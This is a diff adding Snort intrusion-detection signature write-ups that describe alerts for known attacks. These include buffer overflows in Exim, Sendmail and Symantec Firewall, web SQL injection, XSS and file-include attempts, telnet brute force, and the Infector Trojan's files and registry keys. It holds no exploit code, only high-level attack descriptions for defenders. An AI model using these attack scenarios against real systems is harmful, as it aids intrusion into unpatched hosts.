+	SGI IRIX versions 6.2 to 6.5.8
+	SGI IRIX versions 5.2 to 6.1 with patches 1010 and 1020. 
+
+--
+Attack Scenarios:
+An attacker can gain a root shell with this attack.
+
+--
+Ease of Attack:
+Simple. Exploit code exisits and is readily available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply patch from SGI.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS304
+
+Bugtraq:
+http://www.securityfocus.com/bid/1572
+
+--
--- /dev/null
+++ b/doc/signatures/2563.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+2563
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with the Symantec Firewall.
+
+--
+Impact:
+A successful attack may cause a heap overflow, permitting the execution
+of arbitrary code on the vulnerable host.
+
+--
+Detailed Information:
+There is a vulnerability in the way the Symantec Firewall handles NetBIOS
+Name Service response packets.  If an attacker crafts a malicious UDP NetBIOS
+Name Service unsolicited response to a vulnerable Symantec Firewall that does
+not block port 137, it is possible to cause a heap overflow and execute
+abitrary code with kernel privileges.  The vulnerability exists because of
+improper validation of the existence of required fields for the NetBIOS name
+returned.  The default configuration does not allow UDP port 137 traffic and
+should not be exploitable if UDP port 137 is blocked.
+
+--
+Affected Systems:
+Symantec Norton Internet Security and Professional 2002,2003,2004
+Symantec Norton Personal Firewall 2002,2003,2004
+Symantec Norton AntiSpam 2004
+Symantec Client Firewall 5.01, 5.1.1
+Symantec Client Security 1.0, 1.1, 2.0(SCF 7.1)
+
+--
+Attack Scenarios:
+An attacker can craft a malicious UDP NetBIOS Name Service response,
+possibly causing a heap overflow and the subsequent execution of
+arbitrary code with kernel privileges on an exploitable host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0444
+
+Bugtraq:
+http://www.securityfocus.com/bid/10335
+
+Misc:
+http://www.eeye.com/html/Research/Advisories/AD20040512C.html
+
+--
--- /dev/null
+++ b/doc/signatures/2591.txt
@@ -0,0 +1,68 @@
+Rule:
+
+
+--
+Sid:
+2591
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the Mail Transfer Agent Exim.
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code on a vulnerable
+server with the privilege of the process running Exim.
+
+--
+Detailed Information:
+Exim is vulnerable to a buffer overflow, permitting an attacker to execute
+arbitrary code.  The vulnerability may be exploited if Exim is configured to
+verify header syntax in the e-mail message body.  This is not the default
+configuration.  If an attacker supplies a large number of spaces after certain
+header fields, it may be possible to cause a buffer overflow.
+
+--
+Affected Systems:
+Exim prior to version 4.34
+
+--
+Attack Scenarios:
+An attacker can create and send mail with a malformed header,
+possibly causing a buffer overflow and permitting the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/10291
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0400
+
+Other:
+http://www.guninski.com/exim1.html
+
+--
--- /dev/null
+++ b/doc/signatures/1034.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1034
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000752.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000752
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Free QBoard" application running on a webserver. Access to the file "contact.php" using a remote file being passed as the "qb_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "qb_path" parameter in the "contact.php" script used by the "Free QBoard" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Free QBoard
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1682.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1682
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1177.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1177
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000663.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000663
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "icq" parameter in the "edit.php" script used 
+by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000769.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000769
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Blog CMS" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "member" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "member" parameter in the "index.php" script used by the "Blog CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blog CMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/851.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+851
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1679.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1679
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/117.txt
@@ -0,0 +1,112 @@
+Rule:
+
+--
+Sid:
+117
+
+--
+Summary:
+Infector is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data via download, upload of files, execution of files
+and reboot the targeted machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Infector sever to
+programs normally started on boot. Due to the nature of this Trojan it 
+is unlikely that the attacker's client IP address has been spoofed.
+
+	SID	Message
+	---	-------
+	117	Infector 1.x
+	120	Infector 1.6 Server to Client
+	121	Infector 1.6 Client to Server Connection Request
+
+This Trojan is commonly used to install other Trojan programs.
+
+The Trojan also makes changes to the system registry and win.ini file.
+
+Notification of an active server is achieved via IRC or ICQ.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This 
+event is indicative of an existing infection being activated. Initial 
+compromise can be in the form of a Win32 installation program that may 
+use the extension ".jpg" or ".bmp" when delivered via e-mail for 
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. 
+Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is located at <drive>:\WINDOWS\Apxil32.exe a backup 
+copy is made and usually named D3x32.drv.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a 
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
+
+Registry keys added are:
+
+	apxil32 = apxil32.exe
+
+Removal of this entry is required.
+
+Delete the file <drive>:\WINDOWS\Apxil32.exe
+
+Ending the Trojan process is also necessary. A reboot of the infected 
+machine is recommended.
+
+A change is also made to the win.ini file, the line run=apxil32.exe 
+apxil32.exe is added and should be deleted.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS315
+http://www.whitehats.com/info/IDS502
+http://www.whitehats.com/info/IDS503
+
+Diamond Computer Systems Security Advisory
+http://www.diamondcs.com.au/web/alerts/infector.htm
+
+Megasecurity:
+http://www.megasecurity.org/trojans/i/infector/Infector_all.html
+
+Simovits:
+http://www.simovits.com/trojans/tr_data/y1627.html
+
+--
--- /dev/null
+++ b/doc/signatures/578.txt
@@ -0,0 +1,60 @@
+Rule:
+
+Sid:
+578
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) cmsd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port cmsd is using.  Attackers can also learn what versions of the cmsd protocol are accepted by cmsd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as cmsd run.  The cmsd RPC service implements the Calendar Manager Service daemon that is often distributed with the Common Desktop Environment (CDE) and OpenWindows.  Several buffer overflow vulnerabilities have been associated with cmsd.
+
+--
+Affected Systems:
+Any host running the RPC service cmsd.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where cmsd runs.  This may be a precursor to accessing cmsd.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access cmsd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for cmsd, not probes of the cmsd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the cmsd service itself. An attacker may attempt to go directly to the cmsd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids 
+http://www.whitehats.com/info/IDS17
+
+
+--
--- /dev/null
+++ b/doc/signatures/2412.txt
@@ -0,0 +1,58 @@
+Rule:  
+
+--
+Sid:
+2412
+
+--
+Summary:
+This event is generated when a cross-site scripting attempt using
+RealNetworks RealPlayer has been successful.
+
+--
+Impact:
+Cross site scripting, information disclosure.
+
+--
+Detailed Information:
+A vulnerability exists in versions of RealPlayer from RealNetworks that
+may allow a remote attacker to launch a sucessful cross-site scripting
+attack against a host running the application.
+
+This event is indicative of a successful attack.
+
+--
+Affected Systems:
+	RealNetworks RealPlayer
+	
+--
+Attack Scenarios:
+An attacker can supply a malformed file to the client making the request
+and use the vulnerability to gain sensitive information from the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2183.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+2183
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in certain versions of Sendmail.
+
+--
+Impact:
+Denial of Service (DoS), possible arbitrary code execution and the 
+remote attacker can gain access to a machine with the credentials of
+the user running the Sendmail daemon, usually 'root'.
+
+--
+Detailed Information:
+A vulnerability exists in the Sendmail MTA Daemon that could allow an
+attacker the opportunity to gain root access.
+
+A programming error exists such that a buffer overflow can be caused
+using the header fields in an SMTP session. The prescan() function does 
+not properly handle certain conversions from character and integer 
+types. This can cause Sendmail to interpret the value as a special 
+control value (NOCHAR).
+
+This rule detects specific exploit code attacks against a server using 
+Sendmail.
+
+--
+Affected Systems:
+	Sendmail Pro (all versions)
+	Sendmail Switch 2.1 prior to 2.1.6
+	Sendmail Switch 2.2 prior to 2.2.6
+	Sendmail Switch 3.0 prior to 3.0.4
+	Sendmail for NT 2.X prior to 2.6.3
+	Sendmail for NT 3.0 prior to 3.0.4
+	Systems running open-source sendmail versions prior to 8.12.9, including UNIX and Linux systems
+
+--
+Attack Scenarios:
+The attacker merely needs to execute one of the available exploit 
+scripts.
+
+--
+Ease of Attack:
+Simple. Exploits for this vulnerability exist.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1793.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1793
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "fetish".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "fetish".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/2304.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2304
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to access the file
+files.inc.php on a web server running a PHP application. This may lead
+to information disclosure, further attacks against the system may be
+possible with the information gained,
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/492.txt
@@ -0,0 +1,102 @@
+Rule:
+  
+--
+
+Rule:
+--
+Sid:
+492
+
+--
+
+Summary:
+This event is generated when an unsuccessful login attempt was made via telnet.
+
+--
+
+Impact:
+Possible unauthorized access via password brute-forcing
+
+An attacker may have attempted to gain access to a valid user's account 
+via the telnet service, but did not succeed.  The telnet service is 
+running, which uses insecure authentication mechanisms.
+
+--
+
+Detailed Information:
+A user tried to log on to a system via telnet, but has been rejected,
+either due to invalid username, password, or both. This could mean 
+someone is trying to log on without proper password (if there are 
+multiple unsuccessful logins) or they may have just mistyped the 
+username or the password.
+
+The telnet server typically runs on TCP port 23.  Upon access to the
+server, account access is granted based on an unencrypted user name and
+password.  Upon a failed login (resulting from either an invalid account
+or an incorrect password), a login failure message will be returned.
+This rule matches the common text "Login failed".
+
+--
+
+Affected Systems:
+Any system running a telnet server.
+
+--
+
+Attack Scenarios:
+Attackers can, particularly when armed with a valid account name,
+attempt to use guessing attacks or brute-force means to gain access via
+the telnet service.  Many successive events of this type would likely be
+indicative of such an attack.
+
+The use of a telnet server allows the passive attack of traffic
+sniffing, which can extract a username and password from any valid
+login.
+
+--
+
+Ease of Attack:
+Simple.
+
+This event indicates it is possible to perform a brute-force attack; the
+ease of such an attack is dependent upon the strength of passwords, and
+rate-limiting techniques employed by the telnet server in question.
+
+--
+
+False Positives:
+This event will match any badly-typed or -remembered password, and will
+therefore generate a false positive.  Look for rapid successive events.
+
+--
+
+False Negatives:
+If a password is correctly guessed, no failure will be noted.
+
+--
+
+Corrective Action:
+Check how many invalid attempts occurred, change the password of the 
+user that tried to log in.
+
+It is best to avoid using telnet whenever possible; its authentication
+system is lacking, and encryption is generally unavailable.  If your
+telnet server can be configured to temporarily disable access after
+rapid successive failures, it as advised that you do so.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Chaos <c@aufbix.org> and Nick Black, Reflex Security <dank@reflexsecurity.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+
+Additional References:
+
+Telnet RFC:
+http://www.faqs.org/rfcs/rfc854.html
+
+--
--- /dev/null
+++ b/doc/signatures/1043.txt
@@ -0,0 +1,65 @@
+Rule:
+--
+Sid:
+1043
+--
+Summary:
+This event is generated when an attempt is made to access the file 
+'viewcode.asp' on a web server.
+--
+Impact:
+If successful, this attack will display the contents of any file on the 
+server.   In addition, it has been reported that this tool is vulnerable
+to a denial of service attack.
+--
+Detailed Information:
+'viewcode.asp' is a utility that ships with various Microsoft products 
+and is meant to allow web site administrators to view the code of active
+server pages during development.   As it will display the contents of 
+any file on the server, it should not be present on a production system,
+but is installed by default with some products or as an option on 
+others.
+
+Also, the tool may be vulnerable to a denial of service attack.
+
+--
+Affected Systems:
+	Microsoft Site Server 3.0
+	Microsoft Site Server 3.0 Commerce Edition
+	Microsoft Commercial Internet System 2.0
+	Microsoft BackOffice Server 4.0
+	Microsoft BackOffice Server 4.5
+	Microsoft Internet Information Server 4.0
+
+--
+Attack Scenarios:
+An attacker can use this tool to steal data or to gather user 
+names/passwords and other information that could facilitate other types 
+of attack.
+--
+Ease of Attack:
+Simple. No exploit software required.
+--
+False Positives:
+None.
+--
+False Negatives:
+None.
+--
+Corrective Action:
+Remove any copies of 'viewcode.asp' from your server.
+--
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+Insecure.org
+http://www.insecure.org/sploits/ms.backoffice.source.html
+
+Microsoft
+http://support.microsoft.com/default.aspx?scid=kb;en-us;Q231368&sd=tech
+
+--
--- /dev/null
+++ b/doc/signatures/1952.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1952
+
+--
+Summary:
+This event is generated when an attempt is made to mount a specific file system exported through Network File System (NFS). 
+
+--
+Impact:
+Remote access.  This mount request can give an attacker remote access to an NFS directory if it is successful. 
+
+--
+Detailed Information:
+The mountd Remote Procedure Call (RPC) implements the NFS mount protocol.  When an NFS client requests a mount of an NFS file system, mountd examines the list of exported file systems.  If the NFS client is permitted access to the requested file system, mountd returns a file handle for the requested directory.  An attacker or legitimate NFS client may request a mount of a specific file system.
+
+--
+Affected Systems:
+All systems running NFS.
+
+--
+Attack Scenarios:
+An attacker may attempt to mount an NFS directory to read or change files.
+
+--
+Ease of Attack:
+Simple.   
+
+--
+False Positives:
+If a legitimate remote user is allowed to mount NFS file systems, this rule may trigger.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
